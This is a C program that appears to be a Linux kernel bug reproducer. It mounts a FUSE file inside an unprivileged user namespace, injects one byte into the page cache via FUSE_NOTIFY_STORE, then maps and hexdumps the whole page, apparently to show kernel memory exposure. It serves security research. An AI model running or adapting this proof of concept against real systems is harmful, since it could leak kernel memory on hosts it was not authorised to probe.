#define _GNU_SOURCE
#include <assert.h>
#include <err.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <ctype.h>
#include <signal.h>
#include <errno.h>
#include <stdbool.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/sendfile.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <linux/fuse.h>
#include <linux/tls.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static void hexdump(void *_data, size_t byte_count) {
  printf("hexdump(%p, 0x%lx)\n", _data, (unsigned long)byte_count);
  for (unsigned long byte_offset = 0; byte_offset < byte_count; byte_offset += 16) {
    unsigned char *bytes = ((unsigned char*)_data) + byte_offset;
    unsigned long line_bytes = (byte_count - byte_offset > 16) ?
            16 : (byte_count - byte_offset);
    char line[1000];
    char *linep = line;
    linep += sprintf(linep, "%08lx  ", byte_offset);
    for (int i=0; i<16; i++) {
      if (i >= line_bytes) {
        linep += sprintf(linep, "   ");
      } else {
        linep += sprintf(linep, "%02hhx ", bytes[i]);
      }
    }
    linep += sprintf(linep, " |");
    for (int i=0; i<line_bytes; i++) {
      if (isalnum(bytes[i]) || ispunct(bytes[i]) || bytes[i] == ' ') {
        *(linep++) = bytes[i];
      } else {
        *(linep++) = '.';
      }
    }
    linep += sprintf(linep, "|");
    puts(line);
  }
}

static void write_file(char *name, char *buf) {
  int fd = SYSCHK(open(name, O_WRONLY));
  if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "write %s", name);
  close(fd);
}

static void write_map(char *name, int outer_id) {
  char buf[100];
  sprintf(buf, "0 %d 1", outer_id);
  write_file(name, buf);
}

static int fuse_fd;
#define READ(_obj) if (read(fuse_fd, &(_obj), sizeof(_obj)) != sizeof(_obj)) err(1, "failed to read " #_obj)
#define WRITE(_obj) if (write(fuse_fd, &(_obj), (_obj).h.len) != (_obj).h.len) err(1, "failed to write " #_obj)
static void fuse_server(void) {
  struct fuse_attr_out attrs = {
    .attr_valid = FATTR_SIZE | FATTR_MODE,
    .attr = {
      .size = 0x1,
      .mode = 0100777
    }
  };
  bool slowdown_done = false;
  while (1) {
    struct {
      struct fuse_in_header inh;
      union {
        struct fuse_init_out init_out;
        struct fuse_open_in open_in;
        struct fuse_read_in read_in;
        char pad[10000];
      };
    } buf;
    assert(SYSCHK(read(fuse_fd, &buf, sizeof(buf))) >= sizeof(buf.inh));
    if (buf.inh.opcode == FUSE_INIT) {
      printf("fuse: init\n");
      struct {
        struct fuse_out_header h;
        struct fuse_init_in b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = { .major = buf.init_out.major, .minor = buf.init_out.minor }
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_OPEN) {
      printf("fuse: open node 0x%lu\n", (unsigned long)buf.inh.nodeid);
      struct {
        struct fuse_out_header h;
        struct fuse_open_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = { .open_flags = 0 }
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_FLUSH) {
      printf("fuse: flush\n");
      struct {
        struct fuse_out_header h;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_GETATTR) {
      printf("fuse: getattr\n");
      struct {
        struct fuse_out_header h;
        struct fuse_attr_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = attrs
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_READ) {
      printf("fuse: read (offset=0x%lx, size=0x%lx)\n", (unsigned long)buf.read_in.offset, (unsigned long)buf.read_in.size);
      assert(buf.read_in.size == 0x1000);
      assert(buf.read_in.offset == 0);
      struct {
        struct fuse_out_header h;
        char data[1];
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .data = "A"
      };
      WRITE(reply);
    } else {
      printf("FUSE_??? %d !!!!!!!!!!!!!\n", buf.inh.opcode);
      struct {
        struct fuse_out_header h;
      } reply = {
        .h = { .len = sizeof(reply), .error = -ENOSYS, .unique = buf.inh.unique },
      };
      WRITE(reply);
    }
  }
  close(fuse_fd);
}

int main(void) {
  // boilerplate start code
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  // set up user namespace (for unprivileged access to FUSE)
  int outer_uid = getuid();
  int outer_gid = getgid();
  SYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS));
  SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL));
  write_file("/proc/self/setgroups", "deny");
  write_map("/proc/self/uid_map", outer_uid);
  write_map("/proc/self/gid_map", outer_gid);

  // create a FUSE mount, and handle requests in a child
  SYSCHK(close(SYSCHK(open("/tmp/mntfile", O_RDONLY|O_CREAT, 0666))));
  fuse_fd = SYSCHK(open("/dev/fuse", O_RDWR));
  char mount_data[4096];
  sprintf(mount_data, "fd=%d,rootmode=0100777,user_id=%d,group_id=%d", fuse_fd, getuid(), getgid());
  SYSCHK(mount("blah", "/tmp/mntfile", "fuse", MS_NODEV|MS_NOSUID, mount_data));
  if (SYSCHK(fork()) == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
    fuse_server();
    exit(0);
  }

  int fuse_file = SYSCHK(open("/tmp/mntfile", O_RDONLY));
  SYSCHK(posix_fadvise(fuse_file, 0, 0, POSIX_FADV_RANDOM));
  printf("opened fuse file\n");

  // HACK:
  // FUSE support for mounting file as root is a bit broken, or maybe it's
  // sendfile()'s fault?
  // Anyway, we have to call fstat() to give the inode the right size.
  printf("calling fstat()\n");
  struct stat st;
  SYSCHK(fstat(fuse_file, &st));
  printf("st_size = 0x%lx\n", (unsigned long)st.st_size);

  struct {
    struct fuse_out_header h;
    struct fuse_notify_store_out b;
    char data[1];
  } __attribute__((packed)) notify_store = {
    .h = { .len = sizeof(notify_store), .error = FUSE_NOTIFY_STORE },
    .b = { .nodeid = 0x1, .offset = 0, .size = 0x1 },
    .data = {'A'}
  };
  WRITE(notify_store);
  char *map = SYSCHK(mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, fuse_file, 0));
  hexdump(map, 0x1000);
}
